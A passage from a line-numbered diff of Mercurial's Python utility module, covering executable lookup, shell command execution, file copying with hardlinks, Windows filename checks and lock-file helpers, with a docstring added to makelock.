1409 datapath = os.path.dirname(pycompat.sysexecutable)
1410 else:
1410 else:
1411 datapath = os.path.dirname(pycompat.fsencode(__file__))
1411 datapath = os.path.dirname(pycompat.fsencode(__file__))
1412
1412
1413 i18n.setdatapath(datapath)
1413 i18n.setdatapath(datapath)
1414
1414
1415 _hgexecutable = None
1415 _hgexecutable = None
1416
1416
1417 def hgexecutable():
1417 def hgexecutable():
1418 """return location of the 'hg' executable.
1418 """return location of the 'hg' executable.
1419
1419
1420 Defaults to $HG or 'hg' in the search path.
1420 Defaults to $HG or 'hg' in the search path.
1421 """
1421 """
1422 if _hgexecutable is None:
1422 if _hgexecutable is None:
1423 hg = encoding.environ.get('HG')
1423 hg = encoding.environ.get('HG')
1424 mainmod = sys.modules[pycompat.sysstr('__main__')]
1424 mainmod = sys.modules[pycompat.sysstr('__main__')]
1425 if hg:
1425 if hg:
1426 _sethgexecutable(hg)
1426 _sethgexecutable(hg)
1427 elif mainfrozen():
1427 elif mainfrozen():
1428 if getattr(sys, 'frozen', None) == 'macosx_app':
1428 if getattr(sys, 'frozen', None) == 'macosx_app':
1429 # Env variable set by py2app
1429 # Env variable set by py2app
1430 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1430 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1431 else:
1431 else:
1432 _sethgexecutable(pycompat.sysexecutable)
1432 _sethgexecutable(pycompat.sysexecutable)
1433 elif (os.path.basename(
1433 elif (os.path.basename(
1434 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1434 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1435 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1435 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1436 else:
1436 else:
1437 exe = findexe('hg') or os.path.basename(sys.argv[0])
1437 exe = findexe('hg') or os.path.basename(sys.argv[0])
1438 _sethgexecutable(exe)
1438 _sethgexecutable(exe)
1439 return _hgexecutable
1439 return _hgexecutable
1440
1440
1441 def _sethgexecutable(path):
1441 def _sethgexecutable(path):
1442 """set location of the 'hg' executable"""
1442 """set location of the 'hg' executable"""
1443 global _hgexecutable
1443 global _hgexecutable
1444 _hgexecutable = path
1444 _hgexecutable = path
1445
1445
1446 def _isstdout(f):
1446 def _isstdout(f):
1447 fileno = getattr(f, 'fileno', None)
1447 fileno = getattr(f, 'fileno', None)
1448 try:
1448 try:
1449 return fileno and fileno() == sys.__stdout__.fileno()
1449 return fileno and fileno() == sys.__stdout__.fileno()
1450 except io.UnsupportedOperation:
1450 except io.UnsupportedOperation:
1451 return False # fileno() raised UnsupportedOperation
1451 return False # fileno() raised UnsupportedOperation
1452
1452
1453 def shellenviron(environ=None):
1453 def shellenviron(environ=None):
1454 """return environ with optional override, useful for shelling out"""
1454 """return environ with optional override, useful for shelling out"""
1455 def py2shell(val):
1455 def py2shell(val):
1456 'convert python object into string that is useful to shell'
1456 'convert python object into string that is useful to shell'
1457 if val is None or val is False:
1457 if val is None or val is False:
1458 return '0'
1458 return '0'
1459 if val is True:
1459 if val is True:
1460 return '1'
1460 return '1'
1461 return pycompat.bytestr(val)
1461 return pycompat.bytestr(val)
1462 env = dict(encoding.environ)
1462 env = dict(encoding.environ)
1463 if environ:
1463 if environ:
1464 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1464 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1465 env['HG'] = hgexecutable()
1465 env['HG'] = hgexecutable()
1466 return env
1466 return env
1467
1467
1468 def system(cmd, environ=None, cwd=None, out=None):
1468 def system(cmd, environ=None, cwd=None, out=None):
1469 '''enhanced shell command execution.
1469 '''enhanced shell command execution.
1470 run with environment maybe modified, maybe in different dir.
1470 run with environment maybe modified, maybe in different dir.
1471
1471
1472 if out is specified, it is assumed to be a file-like object that has a
1472 if out is specified, it is assumed to be a file-like object that has a
1473 write() method. stdout and stderr will be redirected to out.'''
1473 write() method. stdout and stderr will be redirected to out.'''
1474 try:
1474 try:
1475 stdout.flush()
1475 stdout.flush()
1476 except Exception:
1476 except Exception:
1477 pass
1477 pass
1478 cmd = quotecommand(cmd)
1478 cmd = quotecommand(cmd)
1479 env = shellenviron(environ)
1479 env = shellenviron(environ)
1480 if out is None or _isstdout(out):
1480 if out is None or _isstdout(out):
1481 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1481 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1482 env=env, cwd=cwd)
1482 env=env, cwd=cwd)
1483 else:
1483 else:
1484 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1484 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1485 env=env, cwd=cwd, stdout=subprocess.PIPE,
1485 env=env, cwd=cwd, stdout=subprocess.PIPE,
1486 stderr=subprocess.STDOUT)
1486 stderr=subprocess.STDOUT)
1487 for line in iter(proc.stdout.readline, ''):
1487 for line in iter(proc.stdout.readline, ''):
1488 out.write(line)
1488 out.write(line)
1489 proc.wait()
1489 proc.wait()
1490 rc = proc.returncode
1490 rc = proc.returncode
1491 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1491 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1492 rc = 0
1492 rc = 0
1493 return rc
1493 return rc
1494
1494
1495 def checksignature(func):
1495 def checksignature(func):
1496 '''wrap a function with code to check for calling errors'''
1496 '''wrap a function with code to check for calling errors'''
1497 def check(*args, **kwargs):
1497 def check(*args, **kwargs):
1498 try:
1498 try:
1499 return func(*args, **kwargs)
1499 return func(*args, **kwargs)
1500 except TypeError:
1500 except TypeError:
1501 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1501 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1502 raise error.SignatureError
1502 raise error.SignatureError
1503 raise
1503 raise
1504
1504
1505 return check
1505 return check
1506
1506
1507 # a whilelist of known filesystems where hardlink works reliably
1507 # a whilelist of known filesystems where hardlink works reliably
1508 _hardlinkfswhitelist = {
1508 _hardlinkfswhitelist = {
1509 'btrfs',
1509 'btrfs',
1510 'ext2',
1510 'ext2',
1511 'ext3',
1511 'ext3',
1512 'ext4',
1512 'ext4',
1513 'hfs',
1513 'hfs',
1514 'jfs',
1514 'jfs',
1515 'NTFS',
1515 'NTFS',
1516 'reiserfs',
1516 'reiserfs',
1517 'tmpfs',
1517 'tmpfs',
1518 'ufs',
1518 'ufs',
1519 'xfs',
1519 'xfs',
1520 'zfs',
1520 'zfs',
1521 }
1521 }
1522
1522
1523 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1523 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1524 '''copy a file, preserving mode and optionally other stat info like
1524 '''copy a file, preserving mode and optionally other stat info like
1525 atime/mtime
1525 atime/mtime
1526
1526
1527 checkambig argument is used with filestat, and is useful only if
1527 checkambig argument is used with filestat, and is useful only if
1528 destination file is guarded by any lock (e.g. repo.lock or
1528 destination file is guarded by any lock (e.g. repo.lock or
1529 repo.wlock).
1529 repo.wlock).
1530
1530
1531 copystat and checkambig should be exclusive.
1531 copystat and checkambig should be exclusive.
1532 '''
1532 '''
1533 assert not (copystat and checkambig)
1533 assert not (copystat and checkambig)
1534 oldstat = None
1534 oldstat = None
1535 if os.path.lexists(dest):
1535 if os.path.lexists(dest):
1536 if checkambig:
1536 if checkambig:
1537 oldstat = checkambig and filestat.frompath(dest)
1537 oldstat = checkambig and filestat.frompath(dest)
1538 unlink(dest)
1538 unlink(dest)
1539 if hardlink:
1539 if hardlink:
1540 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1540 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1541 # unless we are confident that dest is on a whitelisted filesystem.
1541 # unless we are confident that dest is on a whitelisted filesystem.
1542 try:
1542 try:
1543 fstype = getfstype(os.path.dirname(dest))
1543 fstype = getfstype(os.path.dirname(dest))
1544 except OSError:
1544 except OSError:
1545 fstype = None
1545 fstype = None
1546 if fstype not in _hardlinkfswhitelist:
1546 if fstype not in _hardlinkfswhitelist:
1547 hardlink = False
1547 hardlink = False
1548 if hardlink:
1548 if hardlink:
1549 try:
1549 try:
1550 oslink(src, dest)
1550 oslink(src, dest)
1551 return
1551 return
1552 except (IOError, OSError):
1552 except (IOError, OSError):
1553 pass # fall back to normal copy
1553 pass # fall back to normal copy
1554 if os.path.islink(src):
1554 if os.path.islink(src):
1555 os.symlink(os.readlink(src), dest)
1555 os.symlink(os.readlink(src), dest)
1556 # copytime is ignored for symlinks, but in general copytime isn't needed
1556 # copytime is ignored for symlinks, but in general copytime isn't needed
1557 # for them anyway
1557 # for them anyway
1558 else:
1558 else:
1559 try:
1559 try:
1560 shutil.copyfile(src, dest)
1560 shutil.copyfile(src, dest)
1561 if copystat:
1561 if copystat:
1562 # copystat also copies mode
1562 # copystat also copies mode
1563 shutil.copystat(src, dest)
1563 shutil.copystat(src, dest)
1564 else:
1564 else:
1565 shutil.copymode(src, dest)
1565 shutil.copymode(src, dest)
1566 if oldstat and oldstat.stat:
1566 if oldstat and oldstat.stat:
1567 newstat = filestat.frompath(dest)
1567 newstat = filestat.frompath(dest)
1568 if newstat.isambig(oldstat):
1568 if newstat.isambig(oldstat):
1569 # stat of copied file is ambiguous to original one
1569 # stat of copied file is ambiguous to original one
1570 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1570 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1571 os.utime(dest, (advanced, advanced))
1571 os.utime(dest, (advanced, advanced))
1572 except shutil.Error as inst:
1572 except shutil.Error as inst:
1573 raise Abort(str(inst))
1573 raise Abort(str(inst))
1574
1574
1575 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1575 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1576 """Copy a directory tree using hardlinks if possible."""
1576 """Copy a directory tree using hardlinks if possible."""
1577 num = 0
1577 num = 0
1578
1578
1579 gettopic = lambda: hardlink and _('linking') or _('copying')
1579 gettopic = lambda: hardlink and _('linking') or _('copying')
1580
1580
1581 if os.path.isdir(src):
1581 if os.path.isdir(src):
1582 if hardlink is None:
1582 if hardlink is None:
1583 hardlink = (os.stat(src).st_dev ==
1583 hardlink = (os.stat(src).st_dev ==
1584 os.stat(os.path.dirname(dst)).st_dev)
1584 os.stat(os.path.dirname(dst)).st_dev)
1585 topic = gettopic()
1585 topic = gettopic()
1586 os.mkdir(dst)
1586 os.mkdir(dst)
1587 for name, kind in listdir(src):
1587 for name, kind in listdir(src):
1588 srcname = os.path.join(src, name)
1588 srcname = os.path.join(src, name)
1589 dstname = os.path.join(dst, name)
1589 dstname = os.path.join(dst, name)
1590 def nprog(t, pos):
1590 def nprog(t, pos):
1591 if pos is not None:
1591 if pos is not None:
1592 return progress(t, pos + num)
1592 return progress(t, pos + num)
1593 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1593 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1594 num += n
1594 num += n
1595 else:
1595 else:
1596 if hardlink is None:
1596 if hardlink is None:
1597 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1597 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1598 os.stat(os.path.dirname(dst)).st_dev)
1598 os.stat(os.path.dirname(dst)).st_dev)
1599 topic = gettopic()
1599 topic = gettopic()
1600
1600
1601 if hardlink:
1601 if hardlink:
1602 try:
1602 try:
1603 oslink(src, dst)
1603 oslink(src, dst)
1604 except (IOError, OSError):
1604 except (IOError, OSError):
1605 hardlink = False
1605 hardlink = False
1606 shutil.copy(src, dst)
1606 shutil.copy(src, dst)
1607 else:
1607 else:
1608 shutil.copy(src, dst)
1608 shutil.copy(src, dst)
1609 num += 1
1609 num += 1
1610 progress(topic, num)
1610 progress(topic, num)
1611 progress(topic, None)
1611 progress(topic, None)
1612
1612
1613 return hardlink, num
1613 return hardlink, num
1614
1614
1615 _winreservednames = {
1615 _winreservednames = {
1616 'con', 'prn', 'aux', 'nul',
1616 'con', 'prn', 'aux', 'nul',
1617 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1617 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1618 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1618 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1619 }
1619 }
1620 _winreservedchars = ':*?"<>|'
1620 _winreservedchars = ':*?"<>|'
1621 def checkwinfilename(path):
1621 def checkwinfilename(path):
1622 r'''Check that the base-relative path is a valid filename on Windows.
1622 r'''Check that the base-relative path is a valid filename on Windows.
1623 Returns None if the path is ok, or a UI string describing the problem.
1623 Returns None if the path is ok, or a UI string describing the problem.
1624
1624
1625 >>> checkwinfilename(b"just/a/normal/path")
1625 >>> checkwinfilename(b"just/a/normal/path")
1626 >>> checkwinfilename(b"foo/bar/con.xml")
1626 >>> checkwinfilename(b"foo/bar/con.xml")
1627 "filename contains 'con', which is reserved on Windows"
1627 "filename contains 'con', which is reserved on Windows"
1628 >>> checkwinfilename(b"foo/con.xml/bar")
1628 >>> checkwinfilename(b"foo/con.xml/bar")
1629 "filename contains 'con', which is reserved on Windows"
1629 "filename contains 'con', which is reserved on Windows"
1630 >>> checkwinfilename(b"foo/bar/xml.con")
1630 >>> checkwinfilename(b"foo/bar/xml.con")
1631 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1631 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1632 "filename contains 'AUX', which is reserved on Windows"
1632 "filename contains 'AUX', which is reserved on Windows"
1633 >>> checkwinfilename(b"foo/bar/bla:.txt")
1633 >>> checkwinfilename(b"foo/bar/bla:.txt")
1634 "filename contains ':', which is reserved on Windows"
1634 "filename contains ':', which is reserved on Windows"
1635 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1635 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1636 "filename contains '\\x07', which is invalid on Windows"
1636 "filename contains '\\x07', which is invalid on Windows"
1637 >>> checkwinfilename(b"foo/bar/bla ")
1637 >>> checkwinfilename(b"foo/bar/bla ")
1638 "filename ends with ' ', which is not allowed on Windows"
1638 "filename ends with ' ', which is not allowed on Windows"
1639 >>> checkwinfilename(b"../bar")
1639 >>> checkwinfilename(b"../bar")
1640 >>> checkwinfilename(b"foo\\")
1640 >>> checkwinfilename(b"foo\\")
1641 "filename ends with '\\', which is invalid on Windows"
1641 "filename ends with '\\', which is invalid on Windows"
1642 >>> checkwinfilename(b"foo\\/bar")
1642 >>> checkwinfilename(b"foo\\/bar")
1643 "directory name ends with '\\', which is invalid on Windows"
1643 "directory name ends with '\\', which is invalid on Windows"
1644 '''
1644 '''
1645 if path.endswith('\\'):
1645 if path.endswith('\\'):
1646 return _("filename ends with '\\', which is invalid on Windows")
1646 return _("filename ends with '\\', which is invalid on Windows")
1647 if '\\/' in path:
1647 if '\\/' in path:
1648 return _("directory name ends with '\\', which is invalid on Windows")
1648 return _("directory name ends with '\\', which is invalid on Windows")
1649 for n in path.replace('\\', '/').split('/'):
1649 for n in path.replace('\\', '/').split('/'):
1650 if not n:
1650 if not n:
1651 continue
1651 continue
1652 for c in _filenamebytestr(n):
1652 for c in _filenamebytestr(n):
1653 if c in _winreservedchars:
1653 if c in _winreservedchars:
1654 return _("filename contains '%s', which is reserved "
1654 return _("filename contains '%s', which is reserved "
1655 "on Windows") % c
1655 "on Windows") % c
1656 if ord(c) <= 31:
1656 if ord(c) <= 31:
1657 return _("filename contains '%s', which is invalid "
1657 return _("filename contains '%s', which is invalid "
1658 "on Windows") % escapestr(c)
1658 "on Windows") % escapestr(c)
1659 base = n.split('.')[0]
1659 base = n.split('.')[0]
1660 if base and base.lower() in _winreservednames:
1660 if base and base.lower() in _winreservednames:
1661 return _("filename contains '%s', which is reserved "
1661 return _("filename contains '%s', which is reserved "
1662 "on Windows") % base
1662 "on Windows") % base
1663 t = n[-1:]
1663 t = n[-1:]
1664 if t in '. ' and n not in '..':
1664 if t in '. ' and n not in '..':
1665 return _("filename ends with '%s', which is not allowed "
1665 return _("filename ends with '%s', which is not allowed "
1666 "on Windows") % t
1666 "on Windows") % t
1667
1667
1668 if pycompat.iswindows:
1668 if pycompat.iswindows:
1669 checkosfilename = checkwinfilename
1669 checkosfilename = checkwinfilename
1670 timer = time.clock
1670 timer = time.clock
1671 else:
1671 else:
1672 checkosfilename = platform.checkosfilename
1672 checkosfilename = platform.checkosfilename
1673 timer = time.time
1673 timer = time.time
1674
1674
1675 if safehasattr(time, "perf_counter"):
1675 if safehasattr(time, "perf_counter"):
1676 timer = time.perf_counter
1676 timer = time.perf_counter
1677
1677
1678 def makelock(info, pathname):
1678 def makelock(info, pathname):
1679 """Create a lock file atomically if possible
1680
1681 This may leave a stale lock file if symlink isn't supported and signal
1682 interrupt is enabled.
1683 """
1679 try:
1684 try:
1680 return os.symlink(info, pathname)
1685 return os.symlink(info, pathname)
1681 except OSError as why:
1686 except OSError as why:
1682 if why.errno == errno.EEXIST:
1687 if why.errno == errno.EEXIST:
1683 raise
1688 raise
1684 except AttributeError: # no symlink in os
1689 except AttributeError: # no symlink in os
1685 pass
1690 pass
1686
1691
1687 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1692 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1688 os.write(ld, info)
1693 os.write(ld, info)
1689 os.close(ld)
1694 os.close(ld)
1690
1695
1691 def readlock(pathname):
1696 def readlock(pathname):
1692 try:
1697 try:
1693 return os.readlink(pathname)
1698 return os.readlink(pathname)
1694 except OSError as why:
1699 except OSError as why:
1695 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1700 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1696 raise
1701 raise
1697 except AttributeError: # no symlink in os
1702 except AttributeError: # no symlink in os
1698 pass
1703 pass
1699 fp = posixfile(pathname)
1704 fp = posixfile(pathname)
1700 r = fp.read()
1705 r = fp.read()
1701 fp.close()
1706 fp.close()
1702 return r
1707 return r
1703
1708
1704 def fstat(fp):
1709 def fstat(fp):
1705 '''stat file object that may not have fileno method.'''
1710 '''stat file object that may not have fileno method.'''
1706 try:
1711 try:
1707 return os.fstat(fp.fileno())
1712 return os.fstat(fp.fileno())
1708 except AttributeError:
1713 except AttributeError:
1709 return os.stat(fp.name)
1714 return os.stat(fp.name)
1710
1715
1711 # File system features
1716 # File system features
1712
1717
1713 def fscasesensitive(path):
1718 def fscasesensitive(path):
1714 """
1719 """
1715 Return true if the given path is on a case-sensitive filesystem
1720 Return true if the given path is on a case-sensitive filesystem
1716
1721
1717 Requires a path (like /foo/.hg) ending with a foldable final
1722 Requires a path (like /foo/.hg) ending with a foldable final
1718 directory component.
1723 directory component.
1719 """
1724 """
1720 s1 = os.lstat(path)
1725 s1 = os.lstat(path)
1721 d, b = os.path.split(path)
1726 d, b = os.path.split(path)
1722 b2 = b.upper()
1727 b2 = b.upper()
1723 if b == b2:
1728 if b == b2:
1724 b2 = b.lower()
1729 b2 = b.lower()
1725 if b == b2:
1730 if b == b2:
1726 return True # no evidence against case sensitivity
1731 return True # no evidence against case sensitivity
1727 p2 = os.path.join(d, b2)
1732 p2 = os.path.join(d, b2)
1728 try:
1733 try:
1729 s2 = os.lstat(p2)
1734 s2 = os.lstat(p2)
1730 if s2 == s1:
1735 if s2 == s1:
1731 return False
1736 return False
1732 return True
1737 return True
1733 except OSError:
1738 except OSError:
1734 return True
1739 return True
1735
1740
1736 try:
1741 try:
1737 import re2
1742 import re2
1738 _re2 = None
1743 _re2 = None
1739 except ImportError:
1744 except ImportError:
1740 _re2 = False
1745 _re2 = False
1741
1746
1742 class _re(object):
1747 class _re(object):
1743 def _checkre2(self):
1748 def _checkre2(self):
1744 global _re2
1749 global _re2
1745 try:
1750 try:
1746 # check if match works, see issue3964
1751 # check if match works, see issue3964
1747 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1752 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1748 except ImportError:
1753 except ImportError:
1749 _re2 = False
1754 _re2 = False
1750
1755
1751 def compile(self, pat, flags=0):
1756 def compile(self, pat, flags=0):
1752 '''Compile a regular expression, using re2 if possible
1757 '''Compile a regular expression, using re2 if possible
1753
1758
1754 For best performance, use only re2-compatible regexp features. The
1759 For best performance, use only re2-compatible regexp features. The
1755 only flags from the re module that are re2-compatible are
1760 only flags from the re module that are re2-compatible are
1756 IGNORECASE and MULTILINE.'''
1761 IGNORECASE and MULTILINE.'''
1757 if _re2 is None:
1762 if _re2 is None:
1758 self._checkre2()
1763 self._checkre2()
1759 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1764 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1760 if flags & remod.IGNORECASE:
1765 if flags & remod.IGNORECASE:
1761 pat = '(?i)' + pat
1766 pat = '(?i)' + pat
1762 if flags & remod.MULTILINE:
1767 if flags & remod.MULTILINE:
1763 pat = '(?m)' + pat
1768 pat = '(?m)' + pat
1764 try:
1769 try:
1765 return re2.compile(pat)
1770 return re2.compile(pat)
1766 except re2.error:
1771 except re2.error:
1767 pass
1772 pass
1768 return remod.compile(pat, flags)
1773 return remod.compile(pat, flags)
1769
1774
1770 @propertycache
1775 @propertycache
1771 def escape(self):
1776 def escape(self):
1772 '''Return the version of escape corresponding to self.compile.
1777 '''Return the version of escape corresponding to self.compile.
1773
1778
1774 This is imperfect because whether re2 or re is used for a particular
1779 This is imperfect because whether re2 or re is used for a particular
1775 function depends on the flags, etc, but it's the best we can do.
1780 function depends on the flags, etc, but it's the best we can do.
1776 '''
1781 '''
1777 global _re2
1782 global _re2
1778 if _re2 is None:
1783 if _re2 is None:
1779 self._checkre2()
1784 self._checkre2()
1780 if _re2:
1785 if _re2:
1781 return re2.escape
1786 return re2.escape
1782 else:
1787 else:
1783 return remod.escape
1788 return remod.escape
1784
1789
1785 re = _re()
1790 re = _re()
1786
1791
1787 _fspathcache = {}
1792 _fspathcache = {}
1788 def fspath(name, root):
1793 def fspath(name, root):
1789 '''Get name in the case stored in the filesystem
1794 '''Get name in the case stored in the filesystem
1790
1795
1791 The name should be relative to root, and be normcase-ed for efficiency.
1796 The name should be relative to root, and be normcase-ed for efficiency.
1792
1797
1793 Note that this function is unnecessary, and should not be
1798 Note that this function is unnecessary, and should not be
1794 called, for case-sensitive filesystems (simply because it's expensive).
1799 called, for case-sensitive filesystems (simply because it's expensive).
1795
1800
1796 The root should be normcase-ed, too.
1801 The root should be normcase-ed, too.
1797 '''
1802 '''
1798 def _makefspathcacheentry(dir):
1803 def _makefspathcacheentry(dir):
1799 return dict((normcase(n), n) for n in os.listdir(dir))
1804 return dict((normcase(n), n) for n in os.listdir(dir))
1800
1805
1801 seps = pycompat.ossep
1806 seps = pycompat.ossep
1802 if pycompat.osaltsep:
1807 if pycompat.osaltsep:
1803 seps = seps + pycompat.osaltsep
1808 seps = seps + pycompat.osaltsep
1804 # Protect backslashes. This gets silly very quickly.
1809 # Protect backslashes. This gets silly very quickly.
1805 seps.replace('\\','\\\\')
1810 seps.replace('\\','\\\\')
1806 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1811 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1807 dir = os.path.normpath(root)
1812 dir = os.path.normpath(root)
1808 result = []
1813 result = []
1809 for part, sep in pattern.findall(name):
1814 for part, sep in pattern.findall(name):
1810 if sep:
1815 if sep:
1811 result.append(sep)
1816 result.append(sep)
1812 continue
1817 continue
1813
1818
1814 if dir not in _fspathcache:
1819 if dir not in _fspathcache:
1815 _fspathcache[dir] = _makefspathcacheentry(dir)
1820 _fspathcache[dir] = _makefspathcacheentry(dir)
1816 contents = _fspathcache[dir]
1821 contents = _fspathcache[dir]
1817
1822
1818 found = contents.get(part)
1823 found = contents.get(part)
1819 if not found:
1824 if not found:
1820 # retry "once per directory" per "dirstate.walk" which
1825 # retry "once per directory" per "dirstate.walk" which
1821 # may take place for each patches of "hg qpush", for example
1826 # may take place for each patches of "hg qpush", for example
1822 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1827 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1823 found = contents.get(part)
1828 found = contents.get(part)
1824
1829
1825 result.append(found or part)
1830 result.append(found or part)
1826 dir = os.path.join(dir, part)
1831 dir = os.path.join(dir, part)
1827
1832
1828 return ''.join(result)
1833 return ''.join(result)
1829
1834
1830 def checknlink(testfile):
1835 def checknlink(testfile):
1831 '''check whether hardlink count reporting works properly'''
1836 '''check whether hardlink count reporting works properly'''
1832
1837
1833 # testfile may be open, so we need a separate file for checking to
1838 # testfile may be open, so we need a separate file for checking to
1834 # work around issue2543 (or testfile may get lost on Samba shares)
1839 # work around issue2543 (or testfile may get lost on Samba shares)
1835 f1, f2, fp = None, None, None
1840 f1, f2, fp = None, None, None
1836 try:
1841 try:
1837 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1842 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1838 suffix='1~', dir=os.path.dirname(testfile))
1843 suffix='1~', dir=os.path.dirname(testfile))
1839 os.close(fd)
1844 os.close(fd)
1840 f2 = '%s2~' % f1[:-2]
1845 f2 = '%s2~' % f1[:-2]
1841
1846
1842 oslink(f1, f2)
1847 oslink(f1, f2)
1843 # nlinks() may behave differently for files on Windows shares if
1848 # nlinks() may behave differently for files on Windows shares if
1844 # the file is open.
1849 # the file is open.
1845 fp = posixfile(f2)
1850 fp = posixfile(f2)
1846 return nlinks(f2) > 1
1851 return nlinks(f2) > 1
1847 except OSError:
1852 except OSError:
1848 return False
1853 return False
1849 finally:
1854 finally:
1850 if fp is not None:
1855 if fp is not None:
1851 fp.close()
1856 fp.close()
1852 for f in (f1, f2):
1857 for f in (f1, f2):
1853 try:
1858 try:
1854 if f is not None:
1859 if f is not None:
1855 os.unlink(f)
1860 os.unlink(f)
1856 except OSError:
1861 except OSError:
1857 pass
1862 pass
1858
1863
1859 def endswithsep(path):
1864 def endswithsep(path):
1860 '''Check path ends with os.sep or os.altsep.'''
1865 '''Check path ends with os.sep or os.altsep.'''
1861 return (path.endswith(pycompat.ossep)
1866 return (path.endswith(pycompat.ossep)
1862 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1867 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1863
1868
1864 def splitpath(path):
1869 def splitpath(path):
1865 '''Split path by os.sep.
1870 '''Split path by os.sep.
1866 Note that this function does not use os.altsep because this is
1871 Note that this function does not use os.altsep because this is
1867 an alternative of simple "xxx.split(os.sep)".
1872 an alternative of simple "xxx.split(os.sep)".
1868 It is recommended to use os.path.normpath() before using this
1873 It is recommended to use os.path.normpath() before using this
1869 function if need.'''
1874 function if need.'''
1870 return path.split(pycompat.ossep)
1875 return path.split(pycompat.ossep)
1871
1876
1872 def gui():
1877 def gui():
1873 '''Are we running in a GUI?'''
1878 '''Are we running in a GUI?'''
1874 if pycompat.isdarwin:
1879 if pycompat.isdarwin:
1875 if 'SSH_CONNECTION' in encoding.environ:
1880 if 'SSH_CONNECTION' in encoding.environ:
1876 # handle SSH access to a box where the user is logged in
1881 # handle SSH access to a box where the user is logged in
1877 return False
1882 return False
1878 elif getattr(osutil, 'isgui', None):
1883 elif getattr(osutil, 'isgui', None):
1879 # check if a CoreGraphics session is available
1884 # check if a CoreGraphics session is available
1880 return osutil.isgui()
1885 return osutil.isgui()
1881 else:
1886 else:
1882 # pure build; use a safe default
1887 # pure build; use a safe default
1883 return True
1888 return True
1884 else:
1889 else:
1885 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1890 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1886
1891
1887 def mktempcopy(name, emptyok=False, createmode=None):
1892 def mktempcopy(name, emptyok=False, createmode=None):
1888 """Create a temporary file with the same contents from name
1893 """Create a temporary file with the same contents from name
1889
1894
1890 The permission bits are copied from the original file.
1895 The permission bits are copied from the original file.
1891
1896
1892 If the temporary file is going to be truncated immediately, you
1897 If the temporary file is going to be truncated immediately, you
1893 can use emptyok=True as an optimization.
1898 can use emptyok=True as an optimization.
1894
1899
1895 Returns the name of the temporary file.
1900 Returns the name of the temporary file.
1896 """
1901 """
1897 d, fn = os.path.split(name)
1902 d, fn = os.path.split(name)
1898 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1903 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1899 os.close(fd)
1904 os.close(fd)
1900 # Temporary files are created with mode 0600, which is usually not
1905 # Temporary files are created with mode 0600, which is usually not
1901 # what we want. If the original file already exists, just copy
1906 # what we want. If the original file already exists, just copy
1902 # its mode. Otherwise, manually obey umask.
1907 # its mode. Otherwise, manually obey umask.
1903 copymode(name, temp, createmode)
1908 copymode(name, temp, createmode)
1904 if emptyok:
1909 if emptyok:
1905 return temp
1910 return temp
1906 try:
1911 try:
1907 try:
1912 try:
1908 ifp = posixfile(name, "rb")
1913 ifp = posixfile(name, "rb")
1909 except IOError as inst:
1914 except IOError as inst:
1910 if inst.errno == errno.ENOENT:
1915 if inst.errno == errno.ENOENT:
1911 return temp
1916 return temp
1912 if not getattr(inst, 'filename', None):
1917 if not getattr(inst, 'filename', None):
1913 inst.filename = name
1918 inst.filename = name
1914 raise
1919 raise
1915 ofp = posixfile(temp, "wb")
